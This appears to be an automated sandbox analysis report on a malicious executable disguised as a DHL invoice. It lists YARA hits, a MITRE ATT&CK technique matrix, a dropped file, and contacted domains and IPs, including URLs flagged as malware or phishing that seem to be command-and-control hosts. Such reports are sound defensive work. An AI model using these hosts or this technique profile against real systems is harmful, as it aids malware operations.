Source: Yara match	File source: 00000005.00000002.2682364766.0000000003200000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1511948267.0000000003AB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.1625529448.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.1635324999.0000000002B10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1511237211.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Code function: 0_2_00481204 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,	0_2_00481204
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Code function: 0_2_00481806 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,	0_2_00481806
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 2_2_006A1204 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,	2_2_006A1204
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 2_2_006A1806 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,	2_2_006A1806

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	111 Scripting	2 Valid Accounts	1 Native API	111 Scripting	1 Exploitation for Privilege Escalation	1 Disable or Modify Tools	21 Input Capture	2 System Time Discovery	Remote Services	1 Archive Collected Data	2 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	1 Shared Modules	1 DLL Side-Loading	1 DLL Side-Loading	1 Deobfuscate/Decode Files or Information	LSASS Memory	1 Account Discovery	Remote Desktop Protocol	21 Input Capture	1 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	2 Valid Accounts	2 Valid Accounts	3 Obfuscated Files or Information	Security Account Manager	3 File and Directory Discovery	SMB/Windows Admin Shares	3 Clipboard Data	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	2 Registry Run Keys / Startup Folder	21 Access Token Manipulation	1 DLL Side-Loading	NTDS	216 System Information Discovery	Distributed Component Object Model	Input Capture	12 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	612 Process Injection	1 Masquerading	LSA Secrets	451 Security Software Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	2 Registry Run Keys / Startup Folder	2 Valid Accounts	Cached Domain Credentials	23 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	23 Virtualization/Sandbox Evasion	DCSync	3 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	21 Access Token Manipulation	Proc Filesystem	11 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	612 Process Injection	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\directory\name.exe	100%	Joe Sandbox ML

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Link
hm23s.top	0%	Virustotal	Browse
alqahtani.site	1%	Virustotal	Browse
www.45941978.top	1%	Virustotal	Browse
www.alqahtani.site	0%	Virustotal	Browse
api.msn.com	0%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label	Link
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV	0%	URL Reputation	safe
https://api.msn.com:443/v1/news/Feed/Windows?	0%	URL Reputation	safe
https://excel.office.com	0%	URL Reputation	safe
http://www.2002w.app/jd21/www.propertiesforrentus11.bond	0%	Avira URL Cloud	safe
https://android.notify.windows.com/iOSA4	0%	Avira URL Cloud	safe
http://www.mahlubini.africa/jd21/www.weight-loss-003.today	0%	Avira URL Cloud	safe
http://www.emiratesnseic.top/jd21/	100%	Avira URL Cloud	malware
https://powerpoint.office.comer	0%	Avira URL Cloud	safe
https://word.office.com	0%	URL Reputation	safe
https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings	0%	URL Reputation	safe
https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew	0%	URL Reputation	safe
https://outlook.com	0%	URL Reputation	safe
http://www.dating-dd-de.infoReferer:	0%	Avira URL Cloud	safe
https://android.notify.windows.com/iOS	0%	URL Reputation	safe
https://activity.windows.com/UserActivity.ReadWrite.CreatedByApp	0%	URL Reputation	safe
https://www.msn.com/en-us/news/us/dumb-and-dumber-12-states-with-the-absolute-worst-education-in-the	0%	URL Reputation	safe
https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/MostlyClearNight.svg	0%	URL Reputation	safe
https://api.msn.com/v1/news/Feed/Windows?	0%	URL Reputation	safe
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gK4J-dark	0%	Avira URL Cloud	safe
https://www.msn.com/en-us/sports/other/simone-biles-leads-u-s-women-s-team-to-seventh-straight-world	0%	Avira URL Cloud	safe
http://www.pools-99305.bond	0%	Avira URL Cloud	safe
http://www.tyumk.xyz/jd21/www.therealtorpeddler.info	0%	Avira URL Cloud	safe
http://www.solveiterzsolutions.fun/jd21/www.mahlubini.africa	0%	Avira URL Cloud	safe
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gK4J-dark	0%	Virustotal		Browse
http://www.pools-99305.bond	0%	Virustotal		Browse
https://www.msn.com/en-us/money/personalfinance/the-big-3-mistakes-financial-advisors-say-that-the-1	0%	Avira URL Cloud	safe
https://www.msn.com/en-us/money/realestate/why-this-florida-city-is-a-safe-haven-from-hurricanes/ar-	0%	Avira URL Cloud	safe
http://www.frametoryframes.shop	0%	Avira URL Cloud	safe
http://www.joycasino-ed46.top/jd21/	0%	Avira URL Cloud	safe
https://www.msn.com/en-us/news/crime/bar-fight-leaves-man-in-critical-condition-suspect-arrested-in-	0%	Avira URL Cloud	safe
http://www.hm23s.top/jd21/	0%	Avira URL Cloud	safe
www.weight-loss-003.today/jd21/	0%	Avira URL Cloud	safe
http://www.weight-loss-003.today	0%	Avira URL Cloud	safe
http://www.2002w.app	0%	Avira URL Cloud	safe
http://www.badcreditloans59.xyz/jd21/	0%	Avira URL Cloud	safe
http://www.authentication-app-69447.bond/jd21/www.cellphonesfxw.today	0%	Avira URL Cloud	safe
http://www.therealtorpeddler.info/jd21/	0%	Avira URL Cloud	safe
http://www.sctttc-or.topReferer:	0%	Avira URL Cloud	safe
http://www.pools-99305.bondReferer:	0%	Avira URL Cloud	safe
http://www.pools-99305.bond/jd21/www.gkbet168.net	0%	Avira URL Cloud	safe
http://www.badcreditloans59.xyz	0%	Avira URL Cloud	safe
http://www.apple0ficial-ld.info/jd21/Fw	100%	Avira URL Cloud	malware
http://www.hm23s.top	0%	Avira URL Cloud	safe
http://www.tyumk.xyz/jd21/	0%	Avira URL Cloud	safe
http://www.xmld101.icu	0%	Avira URL Cloud	safe
http://www.authentication-app-69447.bond	0%	Avira URL Cloud	safe
http://www.mahlubini.africaReferer:	0%	Avira URL Cloud	safe
https://upload.wikimedia.org/wikipedia/commons/thumb/8/84/Zealandia-Continent_map_en.svg/1870px-Zeal	0%	Avira URL Cloud	safe
http://www.badcreditloans59.xyzReferer:	0%	Avira URL Cloud	safe
http://www.microsoft.c	0%	Avira URL Cloud	safe
https://wns.windows.com/	0%	Avira URL Cloud	safe
https://android.notify.windows.com/iOSd	0%	Avira URL Cloud	safe
http://www.propertiesforrentus11.bondReferer:	0%	Avira URL Cloud	safe
https://assets.msn.com/weathermapdata/1/static/weather/taskbar/animation/WeatherInsights/WeatherInsi	0%	Avira URL Cloud	safe
http://www.propertiesforrentus11.bond/jd21/	100%	Avira URL Cloud	phishing
http://www.nextdoor3.store/jd21/www.frametoryframes.shop	0%	Avira URL Cloud	safe
http://www.hm23s.top/jd21/www.alqahtani.site	0%	Avira URL Cloud	safe
http://www.nextdoor3.storeReferer:	0%	Avira URL Cloud	safe
http://www.sctttc-or.top/jd21/	0%	Avira URL Cloud	safe
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT-dark	0%	Avira URL Cloud	safe
http://www.authentication-app-69447.bond/jd21/	0%	Avira URL Cloud	safe
http://www.cellphonesfxw.today	0%	Avira URL Cloud	safe
https://www.msn.com/en-us/foodanddrink/foodnews/black-slimy-matter-on-mint-leaves-toxic-chemicals-ne	0%	Avira URL Cloud	safe
http://www.propertiesforrentus11.bond/jd21/www.tyumk.xyz	100%	Avira URL Cloud	phishing
http://www.mvtb.pics/jd21/	0%	Avira URL Cloud	safe
http://www.sctttc-or.top/jd21/www.solveiterzsolutions.fun	0%	Avira URL Cloud	safe
http://www.hm23s.topReferer:	0%	Avira URL Cloud	safe
http://www.alqahtani.siteReferer:	0%	Avira URL Cloud	safe
http://www.apple0ficial-ld.infoReferer:	0%	Avira URL Cloud	safe
http://www.gkbet168.netReferer:	0%	Avira URL Cloud	safe
http://www.forklift-jobs-29768.bondReferer:	0%	Avira URL Cloud	safe
http://www.xmld101.icu/jd21/www.nextdoor3.store	0%	Avira URL Cloud	safe
https://android.notify.windows.com/iOS~	0%	Avira URL Cloud	safe
http://www.emiratesnseic.topReferer:	0%	Avira URL Cloud	safe
http://www.emiratesnseic.top/jd21/www.030002787.xyz	100%	Avira URL Cloud	malware
http://www.frametoryframes.shopReferer:	0%	Avira URL Cloud	safe
http://www.dating-dd-de.info/jd21/	0%	Avira URL Cloud	safe
http://www.dating-dd-de.info	0%	Avira URL Cloud	safe
http://www.borghardt.xyz	0%	Avira URL Cloud	safe
http://www.joycasino-ed46.topReferer:	0%	Avira URL Cloud	safe
http://www.alqahtani.site/jd21/	0%	Avira URL Cloud	safe
http://www.gkbet168.net	0%	Avira URL Cloud	safe
http://www.weight-loss-003.today/jd21/www.emiratesnseic.top	0%	Avira URL Cloud	safe
http://www.tyumk.xyz/jd21/www.badcreditloans59.xyz	0%	Avira URL Cloud	safe
http://www.alqahtani.site/jd21/www.circusenergy.online	0%	Avira URL Cloud	safe
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gKBA	0%	Avira URL Cloud	safe
http://www.weight-loss-003.today/jd21/	0%	Avira URL Cloud	safe
https://www.msn.com/en-us/sports/other/washington-state-ad-asks-ncaa-for-compassion-and-understandin	0%	Avira URL Cloud	safe
http://www.emiratesnseic.top	0%	Avira URL Cloud	safe
http://www.45941978.topReferer:	0%	Avira URL Cloud	safe
http://www.tyumk.xyz	0%	Avira URL Cloud	safe
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gF9k-dark	0%	Avira URL Cloud	safe
http://www.circusenergy.online	0%	Avira URL Cloud	safe
http://www.mvtb.pics/jd21/www.apple0ficial-ld.info	0%	Avira URL Cloud	safe
http://www.frametoryframes.shop/jd21/www.dating-dd-de.info	100%	Avira URL Cloud	malware
http://www.therealtorpeddler.info	0%	Avira URL Cloud	safe
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT	0%	Avira URL Cloud	safe
http://www.therealtorpeddler.infoReferer:	0%	Avira URL Cloud	safe
http://www.forklift-jobs-29768.bond	0%	Avira URL Cloud	safe
https://www.msn.com/en-us/weather/topstories/first-map-of-earth-s-lost-continent-has-been-published/	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
hm23s.top	154.23.184.95	true	true	0%, Virustotal, Browse	unknown
alqahtani.site	3.33.130.190	true	true	1%, Virustotal, Browse	unknown
www.authentication-app-69447.bond	185.53.179.91	true	true		unknown
www.45941978.top	unknown	unknown	true	1%, Virustotal, Browse	unknown
www.alqahtani.site	unknown	unknown	true	0%, Virustotal, Browse	unknown
www.borghardt.xyz	unknown	unknown	true		unknown
www.hm23s.top	unknown	unknown	true		unknown
api.msn.com	unknown	unknown	true	0%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
www.weight-loss-003.today/jd21/	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.emiratesnseic.top/jd21/	explorer.exe, 00000004.00000002.2355563195.000000000C1DE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2285121110.000000000C1DE000.00000004.00000001.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://powerpoint.office.comer	explorer.exe, 00000004.00000002.2351312373.000000000BBB0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1464190970.000000000BBB0000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.2002w.app/jd21/www.propertiesforrentus11.bond	explorer.exe, 00000004.00000002.2355563195.000000000C1DE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2285121110.000000000C1DE000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://android.notify.windows.com/iOSA4	explorer.exe, 00000004.00000000.1464190970.000000000BC80000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2352030315.000000000BCB7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2286095962.000000000BCB4000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.mahlubini.africa/jd21/www.weight-loss-003.today	explorer.exe, 00000015.00000002.2698810069.000000000C158000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.dating-dd-de.infoReferer:	explorer.exe, 00000004.00000002.2355563195.000000000C1DE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2285121110.000000000C1DE000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV	explorer.exe, 00000015.00000003.2350390233.00000000075E4000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.2686276323.00000000075E4000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gK4J-dark	explorer.exe, 00000015.00000003.2350390233.00000000075E4000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://www.msn.com/en-us/sports/other/simone-biles-leads-u-s-women-s-team-to-seventh-straight-world	explorer.exe, 00000015.00000003.2350390233.00000000075E4000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.2686276323.00000000075E4000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://api.msn.com:443/v1/news/Feed/Windows?	explorer.exe, 00000004.00000003.2284163975.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2344169455.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1457725429.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1455950786.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2346753313.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.2350390233.00000000075E4000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.2686276323.00000000075E4000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.2397384870.000000000926A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.2691561420.000000000926A000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.pools-99305.bond	explorer.exe, 00000015.00000002.2698810069.000000000C158000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.tyumk.xyz/jd21/www.therealtorpeddler.info	explorer.exe, 00000015.00000002.2698810069.000000000C158000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.solveiterzsolutions.fun/jd21/www.mahlubini.africa	explorer.exe, 00000015.00000002.2698810069.000000000C158000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://excel.office.com	explorer.exe, 00000004.00000002.2351312373.000000000BBB0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1464190970.000000000BBB0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.2397231985.0000000009274000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.msn.com/en-us/money/personalfinance/the-big-3-mistakes-financial-advisors-say-that-the-1	explorer.exe, 00000004.00000002.2344169455.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1455950786.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.2350390233.00000000075E4000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.2686276323.00000000075E4000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.msn.com/en-us/money/realestate/why-this-florida-city-is-a-safe-haven-from-hurricanes/ar-	explorer.exe, 00000015.00000003.2350390233.00000000075E4000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.frametoryframes.shop	explorer.exe, 00000004.00000002.2355563195.000000000C1DE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2285121110.000000000C1DE000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.msn.com/en-us/news/crime/bar-fight-leaves-man-in-critical-condition-suspect-arrested-in-	explorer.exe, 00000015.00000003.2350390233.00000000075E4000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.joycasino-ed46.top/jd21/	explorer.exe, 00000004.00000002.2355563195.000000000C1DE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2285121110.000000000C1DE000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.hm23s.top/jd21/	explorer.exe, 00000015.00000002.2698810069.000000000C158000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.weight-loss-003.today	explorer.exe, 00000004.00000002.2355563195.000000000C1DE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2285121110.000000000C1DE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.2698810069.000000000C158000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.2002w.app	explorer.exe, 00000004.00000002.2355563195.000000000C1DE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2285121110.000000000C1DE000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.badcreditloans59.xyz/jd21/	explorer.exe, 00000004.00000003.2285121110.000000000C1DE000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.authentication-app-69447.bond/jd21/www.cellphonesfxw.today	explorer.exe, 00000015.00000002.2698810069.000000000C158000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.sctttc-or.topReferer:	explorer.exe, 00000015.00000002.2698810069.000000000C158000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.therealtorpeddler.info/jd21/	explorer.exe, 00000015.00000002.2698810069.000000000C158000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.pools-99305.bondReferer:	explorer.exe, 00000015.00000002.2698810069.000000000C158000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.badcreditloans59.xyz	explorer.exe, 00000004.00000002.2355563195.000000000C1DE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2285121110.000000000C1DE000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.pools-99305.bond/jd21/www.gkbet168.net	explorer.exe, 00000015.00000002.2698810069.000000000C158000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.apple0ficial-ld.info/jd21/Fw	explorer.exe, 00000015.00000002.2698810069.000000000C158000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.hm23s.top	explorer.exe, 00000015.00000002.2698810069.000000000C158000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.tyumk.xyz/jd21/	explorer.exe, 00000004.00000002.2355563195.000000000C1DE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2285121110.000000000C1DE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.2698810069.000000000C158000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.xmld101.icu	explorer.exe, 00000004.00000002.2355563195.000000000C1DE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2285121110.000000000C1DE000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.authentication-app-69447.bond	explorer.exe, 00000004.00000002.2355563195.000000000C1DE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2285121110.000000000C1DE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.2698810069.000000000C158000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.mahlubini.africaReferer:	explorer.exe, 00000015.00000002.2698810069.000000000C158000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://upload.wikimedia.org/wikipedia/commons/thumb/8/84/Zealandia-Continent_map_en.svg/1870px-Zeal	explorer.exe, 00000004.00000002.2344169455.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1455950786.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.2350390233.00000000075E4000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.2686276323.00000000075E4000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.badcreditloans59.xyzReferer:	explorer.exe, 00000004.00000002.2355563195.000000000C1DE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2285121110.000000000C1DE000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://wns.windows.com/	explorer.exe, 00000004.00000002.2352030315.000000000BCB7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2286095962.000000000BCB4000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.microsoft.c	explorer.exe, 00000004.00000000.1457725429.0000000009237000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2346753313.0000000009237000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2284163975.0000000009237000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://android.notify.windows.com/iOSd	explorer.exe, 00000004.00000000.1464190970.000000000BC80000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2352030315.000000000BCB7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2286095962.000000000BCB4000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.propertiesforrentus11.bondReferer:	explorer.exe, 00000004.00000002.2355563195.000000000C1DE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2285121110.000000000C1DE000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://assets.msn.com/weathermapdata/1/static/weather/taskbar/animation/WeatherInsights/WeatherInsi	explorer.exe, 00000004.00000002.2344169455.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1455950786.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.2350390233.00000000075E4000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.2686276323.00000000075E4000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.propertiesforrentus11.bond/jd21/	explorer.exe, 00000004.00000002.2355563195.000000000C1DE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2285121110.000000000C1DE000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://www.nextdoor3.store/jd21/www.frametoryframes.shop	explorer.exe, 00000004.00000002.2355563195.000000000C1DE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2285121110.000000000C1DE000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.hm23s.top/jd21/www.alqahtani.site	explorer.exe, 00000015.00000002.2698810069.000000000C158000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://word.office.com	explorer.exe, 00000015.00000003.2397231985.0000000009274000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.nextdoor3.storeReferer:	explorer.exe, 00000004.00000002.2355563195.000000000C1DE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2285121110.000000000C1DE000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings	explorer.exe, 00000015.00000002.2686276323.00000000075E4000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.sctttc-or.top/jd21/	explorer.exe, 00000015.00000002.2698810069.000000000C158000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT-dark	explorer.exe, 00000004.00000002.2344169455.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1455950786.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.2350390233.00000000075E4000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.2686276323.00000000075E4000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.authentication-app-69447.bond/jd21/	explorer.exe, 00000004.00000002.2355563195.000000000C1DE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2285121110.000000000C1DE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.2698810069.000000000C158000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.cellphonesfxw.today	explorer.exe, 00000015.00000002.2698810069.000000000C158000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.msn.com/en-us/foodanddrink/foodnews/black-slimy-matter-on-mint-leaves-toxic-chemicals-ne	explorer.exe, 00000015.00000003.2350390233.00000000075E4000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.propertiesforrentus11.bond/jd21/www.tyumk.xyz	explorer.exe, 00000004.00000002.2355563195.000000000C1DE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2285121110.000000000C1DE000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew	explorer.exe, 00000004.00000002.2344169455.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1455950786.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.2350390233.00000000075E4000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.2686276323.00000000075E4000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
